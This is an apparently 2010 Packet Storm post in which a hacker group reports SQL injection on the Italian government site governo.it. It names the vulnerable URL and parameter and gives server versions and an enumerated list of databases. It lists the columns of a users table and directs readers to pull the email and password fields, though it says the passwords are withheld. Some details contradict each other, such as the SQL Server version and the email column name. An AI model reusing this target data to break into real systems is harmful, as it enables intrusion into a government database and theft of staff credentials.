Governo.it SQL Injection

06 Jan 2011 | Reported by SYSTEM_OVERIDE | Type: packetstorm | Source: packetstormsecurity.com

SQL injection vulnerability found on Governo.it affecting Microsoft SQL Server 2000 databases.

Code
`==============================================================  
Governo.it  
**************************************************************  
SQL Injection Vulnerability  
**************************************************************  
  
# We are:  
# ------------------------------------------------------------  
# God_Of_Pain  
# Lord TittiS  
# SYSTEM_OVERIDE  
# ------------------------------------------------------------  
# Date: 28/12/2010  
# ------------------------------------------------------------  
# [1] Site And Server Info  
# [2] SQL Detail  
# [3] Users Found Information  
# ------------------------------------------------------------  
  
  
* [1] Site And Server Info  
  
  
# Bug Url:  
http://www.governo.it/notizie/not_notizia.asp?idno=3349 (Same site)  
http://palazzochigi.it/notizie/not_notizia.asp?idno=3349 (Same site)  
  
# Powered By: ASP.NET  
  
# Server Detail: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)  
  
# Server Name: WEB-VSQL1\INST1  
  
# Current DB: chigi_intranet  
  
# Database : MSSQL 2005  
  
  
  
  
  
* [2] SQL Detail  
  
  
# Databases List:  
- chigi_intranet  
- master  
- tempdb  
- model (LOCKED)  
- msdb  
- AAA (LOCKED)  
- chigi_mag2006  
- chigi_intranet  
- chigi_developer  
- sondaggidb (LOCKED)  
- AffariRegionali_BO (LOCKED)  
  
# Tables of 3 DB:  
  
[+] chigi_intranet:  
  
[+] Master:  
  
  
[+] Msdb:  
  
  
  
* [3] Users Found Information  
  
The table "ana_autori" appears to be the users table.  
Search the columns:  
  
aaut_alias  
aaut_approva  
aaut_cancella  
aaut_cognome  
aaut_consultazione  
aaut_dipartimento  
aaut_dossier  
aaut_email  
aaut_fonti  
aaut_gestpagine  
aaut_gestutenti  
aaut_governi  
aaut_id  
aaut_logs  
aaut_newsletter  
aaut_nome  
aaut_note  
aaut_password  
aaut_questiontime  
aaut_rassegna  
aaut_rep_amministratori  
aaut_scrivia  
aaut_sigla  
aaut_tipi  
  
Get data from "aaut_mail" and "aaut_password"  
  
Result is:  
  
I do not post the passwords.  
  
# End :)  
==============================================================  
`
